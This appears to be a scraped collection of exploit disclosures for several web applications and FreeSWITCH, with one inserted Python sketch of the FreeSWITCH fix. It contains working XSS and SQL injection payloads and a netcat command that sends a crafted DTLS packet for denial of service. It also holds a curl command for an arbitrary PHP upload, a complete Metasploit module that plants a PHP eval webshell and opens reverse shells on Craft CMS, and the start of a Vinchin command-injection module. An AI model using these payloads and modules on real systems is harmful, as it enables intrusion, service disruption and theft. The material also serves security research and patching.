<pre><code># Exploit Title: WhatACart Version: 2.0.7 - Reflected XSS<br /># Date: 2023-12-27<br /># Exploit Author: tmrswrr<br /># Category : Webapps<br /># Vendor Homepage: https://whatacart.com<br /># Version: 2.0.7<br /># Tested on: https://whatacart.com/demo<br /><br /><br />1 ) Go to this page : https://demo.whatacart.com/<br />2 ) Enter this payload in the search field : <sVg/onLy=1 onLoaD=confirm(1)//<br />3 ) You will see an alert box : https://demo.whatacart.com/site/default/search?keyword=%3CsVg%2FonLy%3D1+onLoaD%3Dconfirm(document.cookie)%2F%2F&navsearch=<br /></code></pre>
<pre><code># Exploit Title: ShopSite Version: 14.0 - Stored XSS<br /># Date: 2023-12-25<br /># Exploit Author: tmrswrr<br /># Category : Webapps<br /># Vendor Homepage: https://www.shopsite.com/<br /># Version: 14.0<br /># Tested on: https://www.shopsite.com/demo.html<br /><br /><br /><br />1 ) Upload the poc.svg file here : https://demo.shopsite.com/cgi-bin/ssdemos/stores/alsdemo/ss/mediam.cgi<br /><br />poc.svg<br /><br /><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 500 500"><br /> <script>//<![CDATA[<br /> alert(document.domain)<br /> //]]><br /> </script><br /></svg><br /><br /><br />2 ) Check here and an alert box will appear : https://a-demo-store.com/ssdemos/stores/alsdemo3/media/ss_sunglasses/aaa.svg<br /></code></pre>
<pre><code># FreeSWITCH susceptible to Denial of Service via DTLS Hello packets during call initiation<br /><br />- Fixed versions: 1.10.11<br />- Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2023-02-freeswitch-dtls-hello-race<br />- Vendor Security Advisory: https://github.com/signalwire/freeswitch/security/advisories/GHSA-39gv-hq72-j6m6<br />- Other references: CVE-2023-51443<br />- Tested vulnerable versions: 1.10.10<br />- Timeline:<br /> - Report date: 2023-09-27<br /> - Triaged: 2023-09-27<br /> - Fix provided for testing: 2023-09-29<br /> - Vendor release with fix: 2023-12-22<br /> - Enable Security advisory: 2023-12-22<br /><br />## TL;DR<br /><br />When handling DTLS-SRTP for media setup, FreeSWITCH is susceptible to Denial of Service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack.<br /><br />## Description<br /><br />Our research has shown that key establishment for Secure Real-time Transport Protocol (SRTP) using Datagram Transport Layer Security Extension (DTLS)[^1] is susceptible to a Denial of Service attack due to a race condition. If an attacker manages to send a ClientHello DTLS message with an invalid CipherSuite (such as `TLS_NULL_WITH_NULL_NULL`) to the port on the FreeSWITCH server that is expecting packets from the caller, a DTLS error is generated. This results in the media session being torn down, which is followed by teardown at signaling (SIP) level too.<br /><br />This behavior was tested against FreeSWITCH version 1.10.10, which was found to be vulnerable to this issue.<br /><br />The following sequence diagram shows the normal flow (i.e. 
no attack) involving SIP and DTLS messages between a UAC (the Caller) and a FreeSWITCH server capable of handling WebRTC calls.<br /><br />Diagram showing a call setup against FreeSWITCH that uses SIP and DTLS:<br />https://user-images.githubusercontent.com/4557407/271063734-85425e09-6945-49b1-ba73-751b6d592ea4.png<br /><br />In a controlled experiment, it was observed that when the Attacker sent a DTLS ClientHello to FreeSWITCH's media port from a different IP and port, FreeSWITCH responded by sending a DTLS Alert to the Caller. Additionally, FreeSWITCH terminated the SIP call by sending a BYE message to the Caller.<br /><br />Diagram showing a call setup against FreeSWITCH that fails due to an attacker-controlled DTLS ClientHello:<br />https://user-images.githubusercontent.com/4557407/271064011-032f9a0e-15af-4645-b008-1fe8b706d75e.png<br /><br />During a real attack, the attacker would spray a vulnerable FreeSWITCH server with DTLS ClientHello messages. The attacker would typically target the range of UDP ports allocated for RTP. When the ClientHello message from the Attacker wins the race against an expected ClientHello from the Caller, the call terminates, resulting in Denial of Service.<br /><br /><br />## Impact<br /><br />Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable FreeSWITCH servers for calls that rely on DTLS-SRTP.<br /><br />## How to reproduce the issue<br /><br />1. Prepare a FreeSWITCH server with an extension configured to handle WebRTC<br />1. 
Send an INVITE message to the target server with WebRTC SDP:<br /><br /> ```default<br /> INVITE sip:1000@192.168.1.202 SIP/2.0<br /> Via: SIP/2.0/WSS 192.168.1.202:36742;rport=36742;branch=z9hG4bK-jQcnXJadB2VGfGmQ<br /> Max-Forwards: 70<br /> From: <sip:1000@192.168.1.202>;tag=L9kc5NfpYG1u67cT<br /> To: <sip:1000@192.168.1.202><br /> Contact: <sip:1000@192.168.1.202><br /> Call-ID: DzGnBLt0z9SK3MC0<br /> CSeq: 5 INVITE<br /> Content-Type: application/sdp<br /> Content-Length: 385<br /><br /> v=0<br /> o=- 1695296331 1695296331 IN IP4 192.168.1.202<br /> s=-<br /> t=0 0<br /> c=IN IP4 192.168.1.202<br /> m=audio 45825 UDP/TLS/RTP/SAVPF 0 8 101<br /> a=setup:active<br /> a=fingerprint:sha-256 49:05:98:B2:15:43:1C:9C:4F:29:07:60:F8:63:77:16:80:F9:44:C0:97:8E:E5:48:D6:71:B4:03:10:85:D6:E3<br /> a=rtpmap:0 PCMU/8000/1<br /> a=rtpmap:8 PCMA/8000/1<br /> a=rtpmap:101 telephone-event/8000<br /> a=rtcp-mux<br /> a=rtcprsize<br /> a=sendrecv<br /> ```<br />1. Note FreeSWITCH's media port and IP values, which will be used as the `<freeswitch-ip>` and `<media-port>` parameters by the Attacker<br />1. Send a DTLS ClientHello message from a (attacker-controlled) host, which is different from the Caller but has network access to the FreeSWITCH server<br /><br /> ```bash<br /> CLIENT_HELLO="Fv7/AAAAAAAAAAAAfAEAAHAAAAAAAAAAcP79AAA" <br /> CLIENT_HELLO="${CLIENT_HELLO}AAG4HCVaUNVbYVmxuqdn2WyCgtTijhZ+WheP/+H"<br /> CLIENT_HELLO="${CLIENT_HELLO}4AAAACAAABAABEABcAAP8BAAEAAAoACAAGAB0AF"<br /> CLIENT_HELLO="${CLIENT_HELLO}wAYAAsAAgEAACMAAAANABQAEgQDCAQEAQUDCAUF"<br /> CLIENT_HELLO="${CLIENT_HELLO}AQgGBgECAQAOAAkABgABAAgABwA="<br /> echo -n "${CLIENT_HELLO}" | base64 --decode | nc -u <freeswitch-ip> <media-port><br /> ```<br />1. Observe that the Caller received a DTLS Alert message and a SIP BYE message on its signaling channel<br /><br />Note that the above steps are used to reliably reproduce the vulnerability. 
In case of a real attack, the attacker simply has to spray the FreeSWITCH server with DTLS messages.<br /><br />## Solution and recommendations<br /><br />To address this vulnerability, upgrade FreeSWITCH to the latest version which includes the security fix. The solution implemented is to drop all packets from addresses that have not been validated by an ICE check.<br /><br />## About Enable Security<br /><br />[Enable Security](https://www.enablesecurity.com) develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack.<br /><br />## Disclaimer<br /><br />The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.<br /><br />## Disclosure policy<br /><br />This report is subject to Enable Security's vulnerability disclosure policy which can be found at <https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy>.<br /><br />[^1]: Datagram Transport Layer Security (DTLS) Extension to Establish Keys for the Secure Real-time Transport Protocol (SRTP) https://datatracker.ietf.org/doc/html/rfc5764<br /><br />--<br /> <br /> Sandro Gauci, CEO at Enable Security GmbH<br /><br /> Register of Companies: AG Charlottenburg HRB 173016 B<br /> Company HQ: Neuburger Straße 101 b, 94036 Passau, Germany<br /> RTCSec Newsletter: https://www.rtcsec.com/subscribe<br /> Our blog: https://www.rtcsec.com<br /> Other points of contact: https://www.enablesecurity.com/contact/<br /><br /></code></pre>
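A defensive illustration of the fix the advisory describes (drop media packets from addresses that have not passed an ICE connectivity check), added here as example code rather than FreeSWITCH's own; `MediaPort`, `simulate`, the record-parsing helpers and the second host address are this example's assumptions, and the packets are constructed for it.

```python
"""Gate DTLS handshake packets on ICE-validated source addresses.

Added illustration of the mitigation in the advisory above. This is not
FreeSWITCH code; the names below are this example's own and the datagrams
are constructed test input.
"""
import struct

DTLS_CONTENT_HANDSHAKE = 22
DTLS_HANDSHAKE_CLIENT_HELLO = 1
DTLS_RECORD_VERSIONS = {0xFEFF, 0xFEFD}  # DTLS 1.0 / DTLS 1.2 record-layer versions
RECORD_HEADER_LEN = 13     # type(1) version(2) epoch(2) sequence(6) length(2)
HANDSHAKE_HEADER_LEN = 12  # msg_type(1) length(3) msg_seq(2) frag_off(3) frag_len(3)


def parse_dtls_record(datagram: bytes):
    """Return (content_type, version, fragment) or None if the record is malformed."""
    if len(datagram) < RECORD_HEADER_LEN:
        return None
    content_type, version, _epoch, _seq_hi, _seq_lo, length = struct.unpack(
        "!BHHHIH", datagram[:RECORD_HEADER_LEN]
    )
    fragment = datagram[RECORD_HEADER_LEN:RECORD_HEADER_LEN + length]
    if len(fragment) != length:
        return None  # truncated record
    return content_type, version, fragment


def is_client_hello(datagram: bytes) -> bool:
    """True if the datagram is a DTLS handshake record carrying a ClientHello."""
    rec = parse_dtls_record(datagram)
    if rec is None:
        return False
    content_type, version, fragment = rec
    if content_type != DTLS_CONTENT_HANDSHAKE or version not in DTLS_RECORD_VERSIONS:
        return False
    if len(fragment) < HANDSHAKE_HEADER_LEN:
        return False
    return fragment[0] == DTLS_HANDSHAKE_CLIENT_HELLO


class MediaPort:
    """One RTP/DTLS media port; ice_validated holds peers that passed a connectivity check."""

    def __init__(self, require_ice: bool = True):
        self.require_ice = require_ice  # False reproduces the pre-fix behaviour
        self.ice_validated = set()

    def ice_check_passed(self, peer):
        self.ice_validated.add(peer)

    def on_datagram(self, src, datagram: bytes) -> str:
        """Classify an inbound datagram: 'drop-unvalidated', 'drop-malformed',
        'dtls-client-hello' (would be handed to the DTLS stack) or 'other'."""
        if self.require_ice and src not in self.ice_validated:
            return "drop-unvalidated"
        if parse_dtls_record(datagram) is None:
            return "drop-malformed"
        if is_client_hello(datagram):
            return "dtls-client-hello"
        return "other"


def make_handshake_record(msg_type: int, body: bytes = b"\x00" * 34) -> bytes:
    """Build a minimal DTLS 1.2 handshake record around one unfragmented message.
    Constructed test input only; the body is a placeholder, not a real ClientHello."""
    length3 = len(body).to_bytes(3, "big")
    hs = (struct.pack("!B", msg_type) + length3 + b"\x00\x00"   # msg_seq 0
          + b"\x00\x00\x00" + length3 + body)                   # frag_off 0, frag_len
    rec = struct.pack("!BHHHIH", DTLS_CONTENT_HANDSHAKE, 0xFEFD, 0, 0, 0, len(hs))
    return rec + hs


CALLER = ("192.168.1.202", 45825)     # the SDP media endpoint from the advisory's INVITE
OTHER_HOST = ("198.51.100.7", 40000)  # constructed: a host that never did an ICE check
CLIENT_HELLO = make_handshake_record(DTLS_HANDSHAKE_CLIENT_HELLO)


def simulate(require_ice: bool):
    """Feed the same ClientHello from both hosts through a port with or without the ICE gate."""
    port = MediaPort(require_ice=require_ice)
    port.ice_check_passed(CALLER)
    return {
        "caller": port.on_datagram(CALLER, CLIENT_HELLO),
        "other_host": port.on_datagram(OTHER_HOST, CLIENT_HELLO),
    }


if __name__ == "__main__":
    print("pre-fix:", simulate(require_ice=False))  # both reach the DTLS stack
    print("fixed  :", simulate(require_ice=True))   # only the ICE-validated caller does
```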
<pre><code>Description: GilaCMS <=1.15.4 - Multiple SQL injection vulnerabilities<br />Affected CMS: GilaCMS<br />Affected Version: <= 1.15.4<br />CVE ID: CVE-2020-26623, CVE-2020-26624, CVE-2020-26625<br />CVSS Score: 7.2 (High)<br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H<br />Discoverers: Chris Chan @ UDomain Web Hosting Co.Ltd, Louise Ng @ UDomain Web Hosting Co.Ltd<br /><br />Multiple SQL injection vulnerabilities were discovered in Gila CMS 1.15.4 and before which allow a remote attacker to execute arbitrary web scripts.<br />Proof of Concept:<br />Attack Vector 1:<br />After logging into the admin portal, go to administration > widget and use the widget area filter to perform a search<br />Sample payload:<br />http://targeturl/cm/list_rows/widget?page=1&area=dashboard'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,@@version,NULL--%20<br /><br />Attack Vector 2:<br />After logging into the admin portal, go to edit post/page/role/user/category/userpost<br />Sample payloads:<br />http://targeturl/cm/edit_form/userrole?id=2'%20and%201%3d0%20UNION%20ALL%20SELECT%20@@version,NULL,NULL--%20&callback=g_form_popup_update<br />http://targeturl/cm/edit_form/user?id=1'%20and%201%3d0%20UNION%20ALL%20SELECT%20NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20<br />http://targeturl/cm/edit_form/page?id=7'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20NULL,@@version,NULL,NULL,NULL--%20<br />http://targeturl/cm/edit_form/post?id=3'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20%20&callback=g_form_popup_update<br />http://targeturl/cm/edit_form/postcategory?id=11'%20%20and%201%3d0%20UNION%20ALL%20SELECT%20NULL,NULL,@@version--%20&callback=g_form_popup_update<br />http://targeturl/cm/edit_form/user-post?id=3'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20&callback=g_form_popup_update<br /><br />Attack Vector 3:<br />After logging into the admin portal, go to Content > Posts and use the Users filter to perform a search<br />Sample payload:<br />http://targeturl/cm/list_rows/post?page=1&user_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,@@version,NULL--%20<br /><br />Recommendation<br />Update to v2.0.1<br /><br />http://gilacms.com<br />https://github.com/GilaCMS/gila<br />https://github.com/GilaCMS/gila/security/policy<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Craft CMS unauthenticated Remote Code Execution (RCE)',<br /> 'Description' => %q{<br /> This module exploits Remote Code Execution vulnerability (CVE-2023-41892) in Craft CMS which is a popular<br /> content management system. Craft CMS versions between 4.0.0-RC1 - 4.4.14 are affected by this vulnerability<br /> allowing attackers to execute arbitrary code remotely, potentially compromising the security and integrity<br /> of the application.<br /><br /> The vulnerability occurs using a PHP object creation in the `\craft\controllers\ConditionsController` class<br /> which allows to run arbitrary PHP code by escalating the object creation calling some methods available in<br /> `\GuzzleHttp\Psr7\FnStream`. Using this vulnerability in combination with The Imagick Extension and MSL which<br /> stands for Magick Scripting Language, a full RCE can be achieved. MSL is a built-in ImageMagick language that<br /> facilitates the reading of images, performance of image processing tasks, and writing of results back<br /> to the filesystem. 
This can be leveraged to create a dummy image containing malicious PHP code using the<br /> Imagick constructor class delivering a webshell that can be accessed by the attacker, thereby executing the<br /> malicious PHP code and gaining access to the system.<br /><br /> Because of this, any remote attacker, without authentication, can exploit this vulnerability to gain<br /> access to the underlying operating system as the user that the web services are running as (typically www-data).<br /> },<br /> 'Author' => [<br /> 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module<br /> 'Thanh', # discovery<br /> 'chybeta' # poc<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2023-41892' ],<br /> [ 'URL', 'https://blog.calif.io/p/craftcms-rce' ],<br /> [ 'URL', 'https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/' ],<br /> [ 'URL', 'https://github.com/advisories/GHSA-4w8r-3xrw-v25g' ],<br /> [ 'URL', 'https://attackerkb.com/topics/2u7OaYlv1M/cve-2023-41892' ],<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => [ 'unix', 'linux', 'php' ],<br /> 'Privileged' => false,<br /> 'Arch' => [ ARCH_CMD, ARCH_PHP, ARCH_X64, ARCH_X86 ],<br /> 'Targets' => [<br /> [<br /> 'PHP',<br /> {<br /> 'Platform' => 'php',<br /> 'Arch' => ARCH_PHP,<br /> 'Type' => :php,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'php/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => [ 'unix', 'linux' ],<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ ARCH_X64, ARCH_X86 ],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => [ 'wget', 'curl', 'printf', 'bourne' ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 
'DisclosureDate' => '2023-09-13',<br /> 'DefaultOptions' => {<br /> 'SSL' => true,<br /> 'RPORT' => 443<br /> },<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],<br /> 'Reliability' => [ REPEATABLE_SESSION ]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [ true, 'Craft CMS base url', '/' ]),<br /> OptString.new('WEBSHELL', [<br /> false, 'The name of the webshell with extension .php. Webshell name will be randomly generated if left unset.', ''<br /> ]),<br /> OptEnum.new('COMMAND', [ true, 'Use PHP command function', 'passthru', [ 'passthru', 'shell_exec', 'system', 'exec' ]], conditions: %w[TARGET != 0])<br /> ]<br /> )<br /> end<br /><br /> def check_phpinfo<br /> # checks vulnerability running phpinfo() and returns upload_tmp_dir and DOCUMENT_ROOT<br /> @config = { 'upload_tmp_dir' => nil, 'document_root' => nil }<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(datastore['TARGETURI']),<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'vars_post' => {<br /> 'action' => 'conditions/render',<br /> 'configObject[class]' => 'craft\elements\conditions\ElementCondition',<br /> 'config' => '{"name":"configObject","as ":{"class":"\\\GuzzleHttp\\\Psr7\\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'<br /> }<br /> })<br /> if res && res.body<br /> # parse HTML to find the upload directory and the document root provided by phpinfo command output<br /> html = res.get_html_document<br /> unless html.blank?<br /> tr_items = html.css('tr td')<br /> tr_items.each_with_index do |item, i|<br /> next if tr_items[i + 1].nil?<br /><br /> if item.text.casecmp?('upload_tmp_dir')<br /> if tr_items[i + 1].text.casecmp?('no value')<br /> @config['upload_tmp_dir'] = '/tmp'<br /> else<br /> @config['upload_tmp_dir'] = tr_items[i + 1].text.strip<br /> end<br /> end<br /> @config['document_root'] = tr_items[i + 
1].text.strip if item.text.casecmp?('$_SERVER[\'DOCUMENT_ROOT\']')<br /> end<br /> end<br /> end<br /> end<br /><br /> def upload_webshell<br /> # randomize file name if option WEBSHELL is not set<br /> if datastore['WEBSHELL'].blank?<br /> @webshell_name = "#{Rex::Text.rand_text_alpha(8..16)}.php"<br /> else<br /> @webshell_name = datastore['WEBSHELL'].to_s<br /> end<br /><br /> # select webshell depending on the target setting (PHP or others).<br /> @post_param = Rex::Text.rand_text_alphanumeric(1..8)<br /> @get_param = Rex::Text.rand_text_alphanumeric(1..8)<br /><br /> if target['Type'] == :php<br /> # create the MSL payload<br /> # payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"<br /> payload = <<~EOS<br /> <?xml version="1.0" encoding="UTF-8"?><br /> <image><br /> <read filename="caption:<?php @eval(base64_decode($_POST[\'#{@post_param}\'])); ?>" /><br /> <write filename="info:#{@config['document_root']}/#{@webshell_name}" /><br /> </image><br /> EOS<br /> else<br /> # create the MSL payload<br /> # payload = "<?=#{datastore['COMMAND']}(base64_decode($_POST[\'#{@post_param}\']));?>"<br /> payload = <<~EOS<br /> <?xml version="1.0" encoding="UTF-8"?><br /> <image><br /> <read filename="caption:<?=#{datastore['COMMAND']}(base64_decode($_POST[\'#{@post_param}\'])); ?>" /><br /> <write filename="info:#{@config['document_root']}/#{@webshell_name}" /><br /> </image><br /> EOS<br /> end<br /><br /> # construct multipart form data with Imagick MSL payload<br /> form_data = Rex::MIME::Message.new<br /> form_data.add_part('conditions/render', nil, nil, 'form-data; name="action"')<br /> form_data.add_part('craft\elements\conditions\ElementCondition', nil, nil, 'form-data; name="configObject[class]"')<br /> form_data.add_part('{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/dev/null"}}}', nil, nil, 'form-data; name="config"')<br /> form_data.add_part(payload, 'text/plain', nil, "form-data; 
name=\"#{Rex::Text.rand_text_alpha(4..8)}\"; filename=\"#{Rex::Text.rand_text_alpha(4..8)}.msl\"")<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(datastore['TARGETURI']),<br /> 'ctype' => "multipart/form-data; boundary=#{form_data.bound}",<br /> 'data' => form_data.to_s<br /> })<br /> if res && res.code == 502<br /> # code 502 indicates a successful upload of the MSL payload in upload_tmp_dir (default /tmp unless specified in php.ini)<br /> # next step is to generate the webshell in DOCUMENT_ROOT by executing the Imagick MSL payload<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(datastore['TARGETURI']),<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'vars_post' => {<br /> 'action' => 'conditions/render',<br /> 'configObject[class]' => 'craft\elements\conditions\ElementCondition',<br /> 'config' => "{\"name\":\"configObject\",\"as \":{\"class\":\"Imagick\", \"__construct()\":{\"files\":\"vid:msl:#{@config['upload_tmp_dir']}/php*\"}}}"<br /> }<br /> })<br /> # code 502 indicates a successful generation of the webshell in DOCUMENT_ROOT<br /> return res&.code == 502<br /> end<br /> false<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> payload = Base64.strict_encode64(cmd)<br /> return send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(datastore['TARGETURI'], @webshell_name),<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'vars_post' => {<br /> @post_param => payload<br /> }<br /> })<br /> end<br /><br /> def on_new_session(session)<br /> # cleanup webshell in DOCUMENT_ROOT<br /> register_files_for_cleanup("#{@config['document_root']}/#{@webshell_name}")<br /><br /> # Imagick plugin generates a php<random chars> file with MSL code in the directory set by<br /> # the PHP ini setting "upload_tmp_dir". 
This file gets executed to generate the webshell.<br /> # A manual cleanup procedure is required to identify and remove the php* files when the session is established.<br /> if session.type == 'meterpreter'<br /> session.fs.dir.chdir(@config['upload_tmp_dir'].to_s)<br /> clean_files = session.fs.dir.entries<br /> else<br /> clean_files = session.shell_command_token("cd #{@config['upload_tmp_dir']};ls php*").split(' ')<br /> end<br /> unless clean_files.blank?<br /> clean_files.each do |f|<br /> register_files_for_cleanup("#{@config['upload_tmp_dir']}/#{f}") if f.match(/^php+/)<br /> end<br /> end<br /> super<br /> end<br /><br /> def check<br /> check_phpinfo<br /> return CheckCode::Appears unless @config['upload_tmp_dir'].nil? || @config['document_root'].nil?<br /><br /> CheckCode::Safe<br /> end<br /><br /> def exploit<br /> # check if upload_tmp_dir and document_root is already initialized with AutoCheck set otherwise run check_phpinfo<br /> check_phpinfo unless datastore['AutoCheck']<br /> fail_with(Failure::NotVulnerable, 'Could not get required phpinfo. System is likely patched.') if @config['upload_tmp_dir'].nil? || @config['document_root'].nil?<br /> fail_with(Failure::UnexpectedReply, "Webshell #{@webshell_name} upload failed.") unless upload_webshell<br /><br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> case target['Type']<br /> when :php, :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager(linemax: 65536)<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>Description: Multiple vulnerabilities were discovered in Hospital Management System<br />Affected CMS: Hospital Management System<br />Affected Version: <= 4.0<br />CVE ID: CVE-2020-26627, CVE-2020-26628, CVE-2020-26629, CVE-2020-26630<br />CVSS Score: 7.2 (High)<br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H<br />Discoverers: Chris Chan @ UDomain Web Hosting Co.Ltd, Louise Ng @ UDomain Web Hosting Co.Ltd<br /><br />Multiple vulnerabilities were discovered in Hospital Management System v4.0 and before which allow a remote attacker to execute arbitrary web scripts.<br />Proof of Concept:<br />Attack Vector 1 (Time-Based SQL injection):<br />Step 1.) Log in as admin<br />Step 2.) Go to Contactus Queries -> unread query -> type something in admin remark (e.g. test) and submit<br />Step 3.) Replace the POST body with the payload below; the server will respond after 5 seconds.<br />adminremark='/**/AND/**/(SELECT/**/1/**/FROM/**/(SELECT(SLEEP(5)))CXde)/**/AND/**/'a'='a&update=<br /><br />Attack Vector 2 (Time-Based SQL injection):<br />Step 1.) Log in as admin<br />Step 2.) Go to Doctors -> Doctor Specialization -> Click Submit<br />Step 3.) Replace the POST body with the payload below; the server will respond after 5 seconds.<br />doctorspecilization='/**/AND/**/(SELECT/**/1/**/FROM/**/(SELECT(SLEEP(5)))CXde)/**/AND/**/'a'='a&submit=<br /><br />Attack Vector 3 (Cross Site Scripting (XSS)):<br />After logging in, an attacker can append malicious JavaScript to their name. Other users will trigger the XSS when they visit this user's profile.<br />Step 1.) Log in to the patient page<br />Step 2.) Go to My Profile > Edit Profile.<br />Step 3.) Append <ScRiPt >alert("poc")</ScRiPt> to the username and save<br />Step 4.) Any other user who visits this profile will trigger the XSS<br /><br />Attack Vector 4 (Unauthenticated Arbitrary File Upload):<br />HMS uses a vulnerable jQuery File Upload component. An attacker can upload any file to the server and trigger it.<br />Step 1.) Upload a file with the curl command below:<br />curl -i -s -k -X $'POST' \<br /> -H $'Content-Type: multipart/form-data; boundary=a211583f728c46a09ca726497e0a5a9f' -H $'Host: localhost' -H $'Content-Length: 164' \<br /> --data-binary $'--a211583f728c46a09ca726497e0a5a9f\x0d\x0aContent-Disposition: form-data; name=\"files[]\"; filename=\"info.php\"\x0d\x0a\x0d\x0a<?php phpinfo(); ?>\x0d\x0a--a211583f728c46a09ca726497e0a5a9f--' \<br /> $'http://localhost/hsm/hms/admin/vendor/jquery-file-upload//server/php/index.php'<br />Step 2.) Visit the URL in the response to trigger the PHP file.<br /><br /><br /><br />Recommendation<br />Update to v5.2.0<br /><br />https://phpgurukul.com/contact-us/<br />https://phpgurukul.com/hospital-management-system-in-php<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Vinchin Backup and Recovery Command Injection',<br /> 'Description' => %q{<br /> This module exploits a command injection vulnerability in Vinchin Backup & Recovery<br /> v5.0.*, v6.0.*, v6.7.*, and v7.0.*. Due to insufficient input validation in the<br /> checkIpExists API endpoint, an attacker can execute arbitrary commands as the<br /> web server user.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Gregory Boddin (LeakIX)', # Vulnerability discovery<br /> 'Valentin Lobstein' # Metasploit module<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-45498'],<br /> ['CVE', '2023-45499'],<br /> ['URL', 'https://blog.leakix.net/2023/10/vinchin-backup-rce-chain/'],<br /> ['URL', 'https://vinchin.com/'] # Vendor URL<br /> ],<br /> 'DisclosureDate' => '2023-10-26',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ IOC_IN_LOGS ],<br /> 'Reliability' => [ REPEATABLE_SESSION ],<br /> 'AKA' => ['Vinchin Command Injection']<br /> },<br /> 'Platform' => ['linux', 'unix'],<br /> 'Arch' => [ARCH_CMD],<br /> 'Targets' => [<br /> ['Automatic', {}]<br /> ],<br /><br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'SSL' => true,<br /> 'FETCH_WRITABLE_DIR' => '/usr/share/nginx/vinchin/tmp'<br /> },<br /> 'Privileged' => false<br /> )<br /> )<br /> register_options(<br /> [<br /> Opt::RPORT(443),<br /> OptString.new('TARGETURI', [true, 'The base path to the Vinchin Backup & Recovery application', '/']),<br /> OptString.new('APIKEY', [true, 'The 
